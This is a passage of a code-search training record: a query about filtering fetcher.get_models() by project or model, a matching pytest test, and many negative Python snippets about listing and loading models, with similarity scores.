'query': {\n 'match_all': {}\n }\n }\n\n results = find_items('model', search_query, page_index)\n\n records = []\n total_items = results['hits']['total']\n\n # Elastic search always returns results, even when you request a non-existing page.\n # To prevent weird behavior in our api, we check for this and return empty results\n # when you requested an empty page.\n if total_items < page_index * PAGE_SIZE:\n return PagedResultSet(page_index, PAGE_SIZE, total_items, [])\n\n for model in results['hits']['hits']:\n records.append({\n 'name': model['_id'],\n 'date_created': model['_source']['date_created']\n })\n\n return PagedResultSet(page_index, PAGE_SIZE, total_items, records)", "def supported_models(cls):\n \n models = []\n \n for subclass in cls.__subclasses__():\n models+=subclass.supported_models()\n return models", "def get_models(self):\n return [Doc(system_object) for system_object in self._get_documents()]", "def generate_models():\n model_names = [\"MLPClassifier\", \"AdaBoostClassifier\", \"SVC\",\n \"KNeighborsClassifier\", \"GaussianProcessClassifier\", \"GaussianNB\",\n \"QuadraticDiscriminantAnalysis\", \"DecisionTreeClassifier\", \"RandomForestClassifier\",\n \"MLPClassifier\"]\n models = [MLPClassifier(), AdaBoostClassifier(), SVC(),\n KNeighborsClassifier(), GaussianProcessClassifier(), GaussianNB(),\n QuadraticDiscriminantAnalysis(), DecisionTreeClassifier(), RandomForestClassifier()]\n models_and_names = zip(model_names, models)\n return models_and_names", "def get_models(automaker, year):\n\n return set([car['model'] for car in data if car['automaker'] == automaker and car['year'] == year])" ]
[ "0.7452906", "0.72231185", "0.7150281", "0.71438277", "0.70214987", "0.69560665", "0.69169444", "0.6905092", "0.68741965", "0.6871369", "0.6853938", "0.6839921", "0.67970765", "0.67815137", "0.6671083", "0.66492426", "0.6614827", "0.65691483", "0.6551473", "0.64561534", "0.64030915", "0.64030915", "0.6399482", "0.6396188", "0.63814276", "0.6364001", "0.6348248", "0.63399523", "0.633756", "0.63346493", "0.6317874", "0.6310297", "0.6295833", "0.6290093", "0.62741774", "0.62663966", "0.6258549", "0.6243772", "0.6243704", "0.62408787", "0.623998", "0.6238229", "0.62263894", "0.62090737", "0.62090737", "0.62070626", "0.6199172", "0.61972946", "0.61865133", "0.61454296", "0.6137827", "0.61363274", "0.61262965", "0.61158365", "0.61061853", "0.6104302", "0.609054", "0.60754573", "0.6057965", "0.6057679", "0.60532993", "0.59942096", "0.5962937", "0.5959612", "0.5957456", "0.59536636", "0.59445024", "0.5927529", "0.5920311", "0.5909054", "0.5895715", "0.5890423", "0.5890423", "0.5890423", "0.5890423", "0.58762765", "0.58757", "0.5866212", "0.585729", "0.5837153", "0.5825809", "0.5823236", "0.5811972", "0.58011675", "0.5779704", "0.57792395", "0.5773715", "0.5770916", "0.57633954", "0.5743078", "0.57327235", "0.5722991", "0.57183313", "0.5717056", "0.5715786", "0.5711716", "0.56948876", "0.5690255", "0.5676176", "0.56756616" ]
0.769774
0
fetcher.get_models() should be able to filter on project or model.
def test_get_models_filters(fc: fetcher.Fetcher, test_project_name, test_model):
    ml = fc.get_models(project=test_project_name)
    assert all(m.project_name == test_project_name for m in ml)

    ml = fc.get_models(model=test_model["name"])
    assert all(m.name == test_model["name"] for m in ml)

    ml = fc.get_models(project=test_project_name, model=test_model["name"])
    assert all(
        m.project_name == test_project_name and m.name == test_model["name"] for m in ml
    )
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _get_models(self, req, is_detail):\n context = req.environ['meteos.context']\n\n search_opts = {}\n search_opts.update(req.GET)\n\n # Remove keys that are not related to model attrs\n search_opts.pop('limit', None)\n search_opts.pop('offset', None)\n sort_key = search_opts.pop('sort_key', 'created_at')\n sort_dir = search_opts.pop('sort_dir', 'desc')\n\n models = self.engine_api.get_all_models(\n context, search_opts=search_opts, sort_key=sort_key,\n sort_dir=sort_dir)\n\n limited_list = common.limited(models, req)\n\n if is_detail:\n models = self._view_builder.detail_list(req, limited_list)\n else:\n models = self._view_builder.summary_list(req, limited_list)\n return models", "def test_get_models_returns_models(fc: fetcher.Fetcher):\n ml = fc.get_models()\n assert isinstance(ml, list)\n assert isinstance(ml[0], models.LookmlModel)", "def GetModels(self, request, context):\n context.code(beta_interfaces.StatusCode.UNIMPLEMENTED)", "def opt_get_all_models_rest_api():\n return retrieve_all_models()", "def models_list(request):\n projects = Project.objects.filter(models=1)\n return render(request, 'screenshower/app/models_list.html', {'projects': projects})", "def list_models(SortBy=None, SortOrder=None, NextToken=None, MaxResults=None, NameContains=None, CreationTimeBefore=None, CreationTimeAfter=None):\n pass", "def test_coupledmodels_get(self):\n pass", "def get_models(self, model_names, callback):\n models = self.get_collection('_model')\n models.find(spec={'_id': {'$in': tuple(model_names)}}).to_list(\n callback=callback)", "def get_models(self, app_name):\n try:\n models = list(apps.get_app_config(app_name).get_models())\n return models\n except:\n raise LookupError(f\"this is no such app {app_name}\")", "def models(self):\r\n return self.get_field('model')", "def models(self):\r\n return self.get_field('model')", "def get_models_for_make(self, make):\n return self.get('vehicles/GetModelsForMake/{}'.format(make))", "def list_models(self, fields=['model_name']):\n\t\tmodels = dbop.get_models(self, model_type='all', fields=fields)\n\t\treturn models", "def test_get_models_throws_if_project_does_not_exist(\n fc: fetcher.Fetcher, project, model\n):\n with pytest.raises(exceptions.NotFoundError) as exc:\n fc.get_models(project=project, model=model)\n assert \"An error occured while getting projects.\" in str(exc.value)", "def test_get_models(self):\n models = get_models()\n self.assertTrue(len(models) > 6)\n self.assertIn((\"csvimport.Item\", \"csvimport.Item\"), models)", "def _retrieve_models(local=True):\n # Check if the download folder exists\n def _get_meta_data(model_name, file):\n return {\n \"data\": {\n \"id\": model_name,\n \"name\": model_name,\n \"description\": model_name,\n \"filename\": os.path.join(\n app.config[\"DOWNLOAD_DIR\"], file),\n \"created\": time.ctime(os.path.getctime(\n os.path.join(\n app.config[\"DOWNLOAD_DIR\"],\n file))),\n \"modified\": time.ctime(os.path.getmtime(\n os.path.join(\n app.config[\"DOWNLOAD_DIR\"],\n file)))\n }\n }\n\n if not os.path.exists(app.config[\"DOWNLOAD_DIR\"]):\n os.makedirs(app.config[\"DOWNLOAD_DIR\"])\n\n if not local:\n # Fetch from a Nexus-hosted catalog\n resources = app.forge.search({\"type\": \"EmbeddingModel\"})\n for resource in resources:\n app.models[resource.name] = {\n \"data\": digest_model_data(resource),\n }\n app.forge.download(\n resource, \"distribution.contentUrl\",\n app.config[\"DOWNLOAD_DIR\"])\n\n pipeline_path = os.path.join(\n app.config[\"DOWNLOAD_DIR\"],\n resource.distribution.name)\n 
app.models[resource.name][\"object\"] = EmbeddingPipeline.load(\n pipeline_path,\n embedder_interface=GraphElementEmbedder,\n embedder_ext=\"zip\")\n\n # Clear the downloads dir\n for f in os.listdir(app.config[\"DOWNLOAD_DIR\"]):\n try:\n os.remove(os.path.join(app.config[\"DOWNLOAD_DIR\"], f))\n except Exception:\n shutil.rmtree(os.path.join(app.config[\"DOWNLOAD_DIR\"], f))\n else:\n # Fetch from a local dir\n for (_, dirs, files) in os.walk(app.config[\"DOWNLOAD_DIR\"]):\n for path in dirs + files:\n if path[0] != \".\":\n match = re.match(r\"(.*)\\.zip\", path)\n if match:\n model_name = match.groups()[0]\n else:\n model_name = path\n app.models[model_name] = _get_meta_data(model_name, path)\n pipeline_path = os.path.join(\n app.config[\"DOWNLOAD_DIR\"], path)\n app.models[model_name][\"object\"] = EmbeddingPipeline.load(\n pipeline_path,\n embedder_interface=GraphElementEmbedder,\n embedder_ext=\"zip\")\n break", "def models() -> list[str]:\n return list(models_url.keys())", "def models(self):\n \n # Call the Razor RESTful API to get a list of models\n headers = {'content-type': 'application/json'}\n r = requests.get(self.url + '/model', headers=headers)\n\n # Check the status code and return appropriately\n if r.status_code == 200:\n return json.loads(r.content)\n else:\n return 'Error in request, exited with status code:' + str(r.status_code)", "def test_get_models_throws_if_model_does_not_exist(fc: fetcher.Fetcher, project, model):\n with pytest.raises(exceptions.NotFoundError) as exc:\n fc.get_models(project=project, model=model)\n assert \"An error occured while getting models.\" in str(exc.value)", "def ListModels(self, request, context):\n context.code(beta_interfaces.StatusCode.UNIMPLEMENTED)", "def load_models(self, models, iteration = None):\n print(\"NOT IMPLEMENTED YET\")", "def get_models(automaker, year):\n\n return set([car['model'] for car in data if car['automaker'] == automaker and car['year'] == year])", "def test_get_used_models(fc: fetcher.Fetcher, test_model):\n used_models = fc.get_used_models()\n assert isinstance(used_models, dict)\n assert len(used_models) > 0\n assert all(type(model_name) == str for model_name in used_models.keys())\n assert all(type(query_count) == int for query_count in used_models.values())\n assert test_model[\"name\"] in used_models.keys()", "def getModels(makeURL):\n\n #Get make page as Soup\n soup, _ = getPage(makeURL)\n\n #Check if page available\n if soup is None:\n #Not available - break\n print(\"Can't find Make URL\")\n quit()\n\n #Try to find models list\n try:\n #Find span with text \"Make\"\n span = soup.find(class_=\"srp-filter-group__filter-name\", text=\"Make\")\n #Move up two parents\n a = span.parent.parent\n #Find all filter names\n b = a.find_all(class_=\"srp-list-filter__item-link link link--no-underline\")\n models = [i['href'] for i in b]\n models = models[1:]\n except:\n print(makeURL)\n models=[]\n \n logger.debug(f\"Models include: {models}\")\n return models", "def test_get_model_names():\n\n names = Instafilter.get_models()\n assert isinstance(names, list)\n assert len(names) > 1", "def GetModels(self, request, context):\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')", "def get_models(automaker, year):\n return set([row[\"model\"] for row in data\n if row[\"automaker\"] == automaker and\n row[\"year\"] == year])", "def get_models(make):\n api_url = 
'https://api.edmunds.com/api/vehicle/v2/{}/models?fmt=json&api_key={}'\\\n .format(make, API_KEY)\n r = requests.get(api_url).json()\n all_models = [model['name'] for model in r['models']]\n return all_models", "def handle_models_request():\n # TODO: add sort and filter by creation/modification date\n return (\n json.dumps({\"models\": {\n k: d[\"data\"] for k, d in app.models.items()\n }}), 200,\n {'ContentType': 'application/json'}\n )", "def get_models(self):\n self.load()\n return self._models", "def models(self):\n return self.config.models()", "def models(r, model):\n\n\tif model==\"PREM\":\n\t\treturn model_prem(r)\n\n\telif model==\"PREM_iso\":\n\t\treturn model_prem_iso(r)\n\n\telif model==\"ONELAYER\":\n\t\treturn model_onelayer(r)\n\n\telif model==\"ONELAYER_pert\":\n\t\treturn model_onelayer_pert(r)\n\n\telif model==\"GUTENBERG\":\n\t\treturn model_gutenberg(r)", "def get_models(self, ApiId: str, MaxResults: str = None, NextToken: str = None) -> Dict:\n pass", "def models(self, model=None):\n for query in self.__queries:\n if isinstance(query, orb.Query):\n yield query.model(model)\n else:\n for model in query.models(model):\n yield model", "def GetModels(self, request, context):\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')", "def index(self, req):\n return self._get_models(req, is_detail=False)", "def get(self, request):\n MODEL_NOT_FOUND = -1\n model_ids = self.request.query_params.get(\"ids\", False)\n if not model_ids:\n return HttpResponse(status=400)\n else:\n model_ids = model_ids.split(\",\")\n results = []\n for model_id in model_ids:\n try:\n model = models.ModelRun.objects.get(id=model_id)\n results.append(\n {\"name\": model.name, \"id\": int(model_id), \"status\": model.status}\n if model.is_base or model.public or model.user == self.request.user\n else {\n \"name\": model.name,\n \"id\": int(model_id),\n \"status\": MODEL_NOT_FOUND,\n }\n )\n except models.ModelRun.DoesNotExist:\n results.append({\"id\": int(model_id), \"status\": MODEL_NOT_FOUND})\n\n return Response({\"results\": results})", "def list_models():\n\tclsmembers = inspect.getmembers(sys.modules[__name__], inspect.isclass)\n\tverif = lambda cls: 'Verified: {0}'.format(cls[1]().verified)\n\tfit_models = [ (cls[0], verif(cls)) for cls in clsmembers if cls[1].__bases__[0] == core.FitModel ]\n\treturn fit_models", "def test_get_models_by_make(self):\n request = self.factory.get('/api/v1/cars', {'make': 'BMW',\n 'distance': 100000})\n response = CarAdViewSet.as_view({'get': 'list'})(request)\n self.assertEqual(response.status_code, HTTPStatus.OK._value_)\n self.assertNotEqual(response.data['models'], [])\n self.assertIs(type(response.data['models'][0]['model']), str)\n self.assertIs(type(response.data['models'][0]['count']), int)", "def GetModels(self, request, timeout, metadata=None, with_call=False, protocol_options=None):\n raise NotImplementedError()", "def models(self, protocol=None, groups=None):\n return self.clients(protocol, groups)", "def import_data(self):\n self.models = []\n for o in self.loader.load():\n klass = self.type_for(o)\n if hasattr(klass, \"from_api\"):\n self.models.append(klass.from_api(o))\n else:\n self.models.append(klass(o))\n return self.models", "def get_queryset(self):\n if hasattr(self, 'revision_model'):\n return self.revision_model.objects\n raise NotImplementedError()", "def fetch_models(self):\n if self.model_pool is None:\n print(\"Please train a model 
first.\", file=STDE)\n EXIT(1)\n else:\n return [copy.deepcopy(m.steps[-1][-1]) for m in self.model_pool]", "def get_model_by_name(self, model_name):\n models = ModelDirectory.get_model_by_name(model_name, pipeline=self)\n return models", "def get_models(self):\n return self.P, self.Q", "def search_models(\n domain: str,\n sub_domain: str,\n architecture: Union[str, None] = None,\n sub_architecture: Union[str, None] = None,\n framework: Union[str, None] = None,\n repo: Union[str, None] = None,\n dataset: Union[str, None] = None,\n training_scheme: Union[str, None] = None,\n sparse_name: Union[str, None] = None,\n sparse_category: Union[str, None] = None,\n sparse_target: Union[str, None] = None,\n release_version: Union[str, None] = None,\n page: int = 1,\n page_length: int = 20,\n override_folder_name: Union[str, None] = None,\n override_parent_path: Union[str, None] = None,\n force_token_refresh: bool = False,\n ) -> List[Model]:\n return Model.search_models(\n domain=domain,\n sub_domain=sub_domain,\n architecture=architecture,\n sub_architecture=sub_architecture,\n framework=framework,\n repo=repo,\n dataset=dataset,\n training_scheme=training_scheme,\n sparse_name=sparse_name,\n sparse_category=sparse_category,\n sparse_target=sparse_target,\n release_version=release_version,\n page=page,\n page_length=page_length,\n override_folder_name=override_folder_name,\n override_parent_path=override_parent_path,\n force_token_refresh=force_token_refresh,\n )", "def availablemodels(self):\n return self.__models.keys()", "def load_models(model_name=\"\", path=\"\", read_grains=False, **kwargs):\n models = pc.load_models('{0}{1}'.format(path, model_name), read_grains=read_grains, **kwargs)\n models_return = []\n for m in models:\n if m.n_zones > 1:\n models_return.append(m)\n else:\n # log failed model\n pass\n return models_return", "def get_models():\n\n from lmfit.models import lmfit_models\n models = lmfit_models\n if 'Expression' in models:\n del models['Expression']\n if 'Gaussian-2D' in models:\n del models['Gaussian-2D']\n\n filenames = set()\n\n models_path = pkg_resources.resource_filename('nexpy.api.frills',\n 'models')\n sys.path.append(models_path)\n for file_ in os.listdir(models_path):\n name, ext = os.path.splitext(file_)\n if name != '__init__' and ext.startswith('.py'):\n filenames.add(name)\n\n private_path = os.path.join(os.path.expanduser('~'), '.nexpy', 'models')\n if os.path.isdir(private_path):\n sys.path.append(private_path)\n for file_ in os.listdir(private_path):\n name, ext = os.path.splitext(file_)\n if name != '__init__' and ext.startswith('.py'):\n filenames.add(name)\n\n for name in sorted(filenames):\n try:\n module = importlib.import_module(name)\n models.update(dict((n.strip('Model'), m)\n for n, m in inspect.getmembers(module,\n inspect.isclass)\n if issubclass(m, Model) and n != 'Model'))\n except ImportError:\n pass\n\n return models", "def ez_get_models(auth_token, options = None):\n status_code = 500\n try:\n API_REQUEST_URL = API_URL + \"/ez_get_models\"\n payload = {\n \"options\": options\n }\n headers = {\n \"Content-Type\": \"application/json\",\n \"Authorization\": \"Bearer \" + str(auth_token),\n }\n response = requests.request(\n \"POST\", API_REQUEST_URL, headers = headers, data = json.dumps(payload)\n )\n status_code = response.status_code\n try:\n response_json = response.json()\n except Exception as e:\n response.raise_for_status()\n response_json[\"status_code\"] = status_code\n return response_json\n except Exception as e:\n 
print((traceback.print_exc()))\n return exception_return(e, status_code)", "def find_models(\n self, artifact_type: str, match_condition: Dict[str, Any], return_model_id: bool = False\n ) -> List[Union[Tuple[MODEL_TYPE, Dict[str, Any]], Tuple[MODEL_TYPE, Dict[str, Any], int]]]:\n documents = self.find_artifacts(artifact_type, match_condition)\n results = []\n for document in documents:\n model = create_model(document['params'])\n model.load_state_dict(document['artifact'])\n if return_model_id:\n results.append((model, document['params'], document['id']))\n else:\n results.append((model, document['params']))\n return results", "def get_objects_with_cmodel(self, cmodel_uri, type=None):\n uris = self.risearch.get_subjects(modelns.hasModel, cmodel_uri)\n return [self.get_object(uri, type) for uri in uris]", "def ListModels(self, request, context):\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')", "def test_get_projects_returns_projects(fc: fetcher.Fetcher):\n projects = fc.get_projects()\n assert isinstance(projects, list)\n assert isinstance(projects[0], models.Project)", "def InitializeModels(\n model_root,\n models=[],\n verbose=False,\n filter=\"\",\n regex=\"\",\n model_year=[],\n log=True,\n models_path=\"./\",\n):\n # initialize the models\n M = []\n if len(model_year) != 2:\n model_year = None\n max_model_name_len = 0\n if rank == 0 and verbose:\n print(\"\\nSearching for model results in %s\\n\" % model_root)\n for subdir, dirs, files in os.walk(model_root):\n for mname in dirs:\n if len(models) > 0 and mname not in models:\n continue\n pkl_file = os.path.join(models_path, \"%s.pkl\" % mname)\n if os.path.isfile(pkl_file):\n with open(pkl_file, \"rb\") as infile:\n m = pickle.load(infile)\n else:\n try:\n m = ModelResult(\n os.path.join(subdir, mname),\n modelname=mname,\n filter=filter,\n regex=regex,\n model_year=model_year,\n )\n except Exception as ex:\n if log:\n logger.debug(\"[%s]\" % mname, format_exc())\n continue\n M.append(m)\n max_model_name_len = max(max_model_name_len, len(mname))\n break\n M = sorted(M, key=lambda m: m.name.upper())\n\n # assign unique colors\n clrs = il.GenerateDistinctColors(len(M))\n for m in M:\n m.color = clrs.pop(0)\n\n # save model objects as pickle files\n comm.Barrier()\n if rank == 0:\n for m in M:\n pkl_file = os.path.join(models_path, \"%s.pkl\" % m.name)\n with open(pkl_file, \"wb\") as out:\n pickle.dump(m, out, pickle.HIGHEST_PROTOCOL)\n\n # optionally output models which were found\n if rank == 0 and verbose:\n for m in M:\n print((\" {0:>45}\").format(m.name))\n\n if len(M) == 0:\n if verbose and rank == 0:\n print(\"No model results found\")\n comm.Barrier()\n comm.Abort(0)\n\n return M", "def test_get_projects_filters(fc: fetcher.Fetcher, test_project_name):\n projects = fc.get_projects(test_project_name)\n assert isinstance(projects, list)\n assert len(projects) == 1\n assert projects[0].name == test_project_name", "def load_models():\n vectorizer = ModelStorage.objects.all().values_list(\"vectorizer\", flat = True)[0]\n classifier = ModelStorage.objects.all().values_list(\"classifier\", flat = True)[0]\n\n return vectorizer, classifier", "def get_available_models():\n modelpath = os.path.join(os.path.dirname(__file__), \"train\", \"model\")\n models = sorted(item.name.replace(\".py\", \"\").replace(\"_\", \"-\")\n for item in os.scandir(modelpath)\n if not item.name.startswith(\"_\")\n and item.name.endswith(\".py\"))\n return 
models", "def find_models(page_index=0):\n search_query = {\n 'query': {\n 'match_all': {}\n }\n }\n\n results = find_items('model', search_query, page_index)\n\n records = []\n total_items = results['hits']['total']\n\n # Elastic search always returns results, even when you request a non-existing page.\n # To prevent weird behavior in our api, we check for this and return empty results\n # when you requested an empty page.\n if total_items < page_index * PAGE_SIZE:\n return PagedResultSet(page_index, PAGE_SIZE, total_items, [])\n\n for model in results['hits']['hits']:\n records.append({\n 'name': model['_id'],\n 'date_created': model['_source']['date_created']\n })\n\n return PagedResultSet(page_index, PAGE_SIZE, total_items, records)", "def get_models_for_make_id(self, make_id):\n return self.get('vehicles/GetModelsForMakeId/{}'.format(make_id))", "def get_available_entities_models():\n return ['concat', 'bahdanau', 'luong']", "def ParseModelSetup(\n model_setup, models=[], verbose=False, filter=\"\", regex=\"\", models_path=\"./\"\n):\n if rank == 0 and verbose:\n print(\"\\nSetting up model results from %s\\n\" % model_setup)\n\n # intercept if this is a yaml file\n if model_setup.endswith(\".yaml\"):\n M = _parse_model_yaml(model_setup, cache_path=models_path, only_models=models)\n if rank == 0 and verbose:\n for m in M:\n print((\" {0:>45}\").format(m.name))\n if len(M) == 0:\n print(\"No model results found\")\n comm.Barrier()\n comm.Abort(0)\n return M\n\n # initialize the models\n M = []\n max_model_name_len = 0\n with open(model_setup) as f:\n for line in f.readlines():\n if line.strip().startswith(\"#\"):\n continue\n line = line.split(\",\")\n mname = None\n mdir = None\n model_year = None\n mgrp = \"\"\n if len(line) >= 2:\n mname = line[0].strip()\n mdir = line[1].strip()\n # if mdir not a directory, then maybe path is relative to ILAMB_ROOT\n if not os.path.isdir(mdir):\n mdir = os.path.join(os.environ[\"ILAMB_ROOT\"], mdir).strip()\n if len(line) == 3:\n mgrp = line[2].strip()\n if len(line) == 4:\n model_year = [float(line[2].strip()), float(line[3].strip())]\n max_model_name_len = max(max_model_name_len, len(mname))\n if (len(models) > 0 and mname not in models) or (mname is None):\n continue\n pkl_file = os.path.join(models_path, \"%s.pkl\" % mname)\n if os.path.isfile(pkl_file):\n with open(pkl_file, \"rb\") as infile:\n m = pickle.load(infile)\n else:\n try:\n m = ModelResult(\n mdir,\n modelname=mname,\n filter=filter,\n regex=regex,\n model_year=model_year,\n group=mgrp,\n )\n except Exception as ex:\n logger.debug(\"[%s]\" % mname, format_exc())\n continue\n M.append(m)\n\n # assign unique colors\n clrs = il.GenerateDistinctColors(len(M))\n for m in M:\n m.color = clrs.pop(0)\n\n # save model objects as pickle files\n comm.Barrier()\n if rank == 0:\n for m in M:\n pkl_file = os.path.join(models_path, \"%s.pkl\" % m.name)\n with open(pkl_file, \"wb\") as out:\n pickle.dump(m, out, pickle.HIGHEST_PROTOCOL)\n\n # optionally output models which were found\n if rank == 0 and verbose:\n for m in M:\n print((\" {0:>45}\").format(m.name))\n\n if len(M) == 0:\n if verbose and rank == 0:\n print(\"No model results found\")\n comm.Barrier()\n comm.Abort(0)\n\n return M", "def get_objects(slice, plugin_type, klass, **kwargs):\n try:\n# plugins_modules = settings.PLUGIN_LOADER.plugin_settings.get(plugin_type).get(\"general\").get(\"aggregate_plugins\")[0]\n plugins_modules = PLUGIN_LOADER.plugin_settings.get(plugin_type).get(\"general\").get(\"aggregate_plugins\")[0]\n p_agg = 
plugins_modules.split('.')[-1]\n p_models_path = '.'.join(plugins_modules.split('.')[:-1])\n try:\n model = getattr(__import__(p_models_path,fromlist=[klass]), klass)\n except: \n try: \n model = getattr(__import__(p_models_path+'.'+klass,fromlist=[klass]), klass)\n except:\n pass \n # Filters resources by slice (will not return any aggregate's resource from another slice)\n objects = model.objects.filter(**kwargs)\n #print \"objects: %s\" % str(objects)\n for obj in objects:\n if not (obj != None and obj.aggregate in slice._get_aggregates()):\n raise Exception\n return objects\n except Exception,e:\n print \"[ERROR] PluginCommunicator could not obtain object. Details: %s \" % str(e)\n return None", "def ListModels(self, request, context):\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')", "def ListModels(self, request, context):\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')", "def load_models(appname):\n return import_module('.models', appname)", "def test_get_hyperflex_server_model_list(self):\n pass", "def simple_models(self, uuid=None):\n \n # Call the Razor RESTful API to get a list of models\n headers = {'content-type': 'application/json'}\n\n if uuid is None:\n r = requests.get(self.url + '/model', headers=headers)\n if r.status_code == 200:\n return json.loads(r.content)\n else:\n return 'Error in request, exited with status code:' + str(r.status_code)\n else:\n r = requests.get(self.url + '/model/' + uuid, headers=headers)\n if r.status_code == 200:\n return self.build_simple_model(json.loads(r.content))\n else:\n return 'Error in request, exited with status code:' + str(r.status_code)", "def iter_models(self):\n return iter(self.model_list)", "def list_models(\n architecture: Optional[str] = typer.Option(None, '-n', '--name', help='Model architecture name'),\n framework: Optional[Framework] = typer.Option(None, '-fw', '--framework', case_sensitive=False,\n help='Framework'),\n engine: Optional[Engine] = typer.Option(None, '-e', '--engine', case_sensitive=False, help='Serving engine'),\n version: Optional[int] = typer.Option(None, '-v', '--version', help='Version'),\n list_all: Optional[bool] = typer.Option(\n False,\n '-a', '--all', is_flag=True,\n help='Display queried models. 
otherwise, only partial result will be shown.'\n ),\n):\n\n payload = remove_dict_null(\n {'architecture': architecture, 'framework': framework, 'engine': engine, 'version': version}\n )\n with requests.get(f'{app_settings.api_v1_prefix}/model', params=payload) as r:\n model_list = r.json()\n model_view([MLModel.parse_obj(model) for model in model_list], list_all=list_all)", "def _get_embedded_models(self,\n model,\n instance,\n success,\n model_names):\n\n callback = partial(self._handle_embedded_models,\n model=model,\n instance=instance,\n success=success)\n self.get_models(model_names=model_names,\n callback=callback)", "def peak_all_models(self) -> List:\n models = list(self.meta.name)\n print(models)\n return models", "def setup_models(self):\n pass", "def get_seo_models():\n seo_models = []\n for model_name in getattr(settings, setting_name_seo_models, ()):\n if \".\" in model_name:\n # TODO: Test this block\n app_label, model_name = model_name.split(\".\", 1)\n model = models.get_model(app_label, model_name)\n if model:\n seo_models.append(model)\n else:\n app = models.get_app(model_name)\n if app:\n seo_models.extend(models.get_models(app))\n\n return seo_models", "def fetch_ml_model_info() -> ApiResponse:\n return _api_response(settings.ML_MODELS)", "def _get_card_model(self, model: str) -> Any:\n return self.collection.models.byName(model)", "def test_get_model(self) -> None:\n get_model()", "def get_model_queryset(self, request):\n if request.user.is_superuser:\n result = Field.objects.all()\n elif hasattr(request.user, 'farmuser'):\n result = Field.objects.filter(farm_user=request.user.farmuser)\n elif hasattr(request.user, 'farmchilduser'):\n result = Field.objects.filter(farm_user=request.user.farmchilduser.master)\n else:\n return None\n return filter_by_date_updated(request=request, queryset=result)", "def models(self) -> t.List[Model]:\n _models: t.List[Model] = [\n item for item in self._deployables if isinstance(item, Model)\n ]\n return _models", "def get_models():\n param = {'C': 0.7678243129497218, 'penalty': 'l2'}\n model1 = LogisticRegression(**param)\n\n param = {'n_neighbors': 8}\n model2 = KNeighborsClassifier(**param)\n\n param = {'C': 1.7, 'kernel': 'linear', 'probability':True}\n model3 = SVC(**param)\n\n param = {'criterion': 'gini', 'max_depth': 3, 'max_features': 2, 'min_samples_leaf': 3}\n model4 = DecisionTreeClassifier(**param)\n\n param = {'learning_rate': 0.05, 'n_estimators': 150}\n model5 = AdaBoostClassifier(**param)\n\n param = {'learning_rate': 0.01, 'n_estimators': 100}\n model6 = GradientBoostingClassifier(**param)\n\n model7 = RandomForestClassifier()\n\n model8 = ExtraTreesClassifier()\n\n models = {'LR':model1, 'KNN':model2, 'SVC':model3, 'DT':model4,\n 'ADa':model5, 'GB':model6, 'RF':model7, 'ET':model8\n }\n return models", "def models(self):\n return self._base.classes", "def list_models(self):\n \n # Interpret the request data based on the expected row and column structure\n row_template = ['strData']\n col_headers = ['search_pattern']\n \n # Create a Pandas Data Frame for the request data\n self.request_df = utils.request_df(self.request, row_template, col_headers)\n \n # Get the list of models based on the search pattern\n search_pattern = self.request_df.loc[0, 'search_pattern']\n \n # If the search pattern is empty default to all models\n if not search_pattern.strip():\n search_pattern = '*'\n \n # Get the list of models as a string\n models = \"\\n\".join([str(p).split(\"\\\\\")[-1] for p in 
list(pathlib.Path(self.path).glob(search_pattern))])\n \n # Prepare the output\n self.response = pd.Series(models)\n \n # Finally send the response\n return self.response", "def _filter(self, _model, **kwargs):\n return _model.objects.filter(**kwargs)", "def get_api_models(actor, what):\n\n def _enforce_tuple(x):\n if not isinstance(x, tuple):\n return (x,)\n return x\n\n def _do_get(api):\n result = _enforce_tuple(getattr(api, what, ()))\n for a in _enforce_tuple(api.apis or ()):\n result = result + _do_get(a)\n return result\n return tuple(set(_do_get(actor)))", "def list_models(self, sort: bool = True, limit: int | None = None) -> Iterator[ExecutableModelSpace]:\n return self._strategy.list_models(sort=sort, limit=limit)", "def download_all_models() -> None:\n model_keys = ModelInfo.get_all_models()\n for model_key in model_keys:\n download_model(model_key)", "def get_model_list():\n with open(os.path.join(MODELS_FOLDER, \"models.json\"), \"r\") as model_file:\n model_list = json.load(model_file)\n return model_list", "def find_crystal_models(self, reflections, experiments):\n raise NotImplementedError()", "def for_app_models(self, *args, **kwargs):\n content_types = []\n for app_model in args:\n app, model = app_model.split(\".\")\n content_types.append(ContentType.objects.get(app_label=app, \n model=model))\n return self.for_content_types(content_types, **kwargs)", "def get_queryset(self):\n request = self.request\n # Allow pages to be filtered to a specific type\n page_type = request.GET.get('type', 'wagtailcore.Page')\n try:\n models = page_models_from_string(page_type)\n except (LookupError, ValueError):\n raise BadRequestError(\"type doesn't exist\")\n if not models:\n models = [Page]\n if len(models) == 1:\n qs = models[0].objects.all()\n else:\n qs = Page.objects.all()\n # Filter pages by specified models\n qs = filter_page_type(qs, models)\n if self.revision_wanted is not None or self.is_preview:\n # Get pages that the current user has permission to publish\n qs = publishable_pages(self.user, qs)\n else:\n # Get live pages that are not in a private section\n qs = qs.live().public()\n # Filter by site\n return qs.descendant_of(request.site.root_page, inclusive=True)", "def list(self, project_id):\n endpoint = \"/project/{}/model\".format(project_id)\n return self._get(endpoint, _ModelSchema(many=True))", "def test_model_get(self):\n response = self.client().get('/model')\n self.assertEqual(response.status_code, 200)\n loaded_model = Model.from_json(response.data.decode())\n self.assertEqual(loaded_model, self.data_manipulation.get_latest_model())\n\n # All versions are removed\n self.data_manipulation.versions = {}\n\n other_response = self.client().get('/model')\n self.assertEqual(other_response.status_code, 404)", "def get_model_queryset(model, request=None):\n if request:\n preview_draft = ('preview' in request.GET and 'draft' in request.GET)\n edit_mode = ('edit' in request.GET or request.session.get('cms_edit', False))\n if preview_draft or edit_mode: \n return model.objects.drafts()\n # Default case / moderator is used but there is no request\n return model.objects.public()", "def get_models_query():\n query = db.session.query(Products.model).distinct()\n return query", "def load_models_by_type(model_type):\n\n # loading the models for each language supported\n return [(lang_id, load_model(lang_id, model_type)) for lang_id in language_id_to_code_mapper]", "def 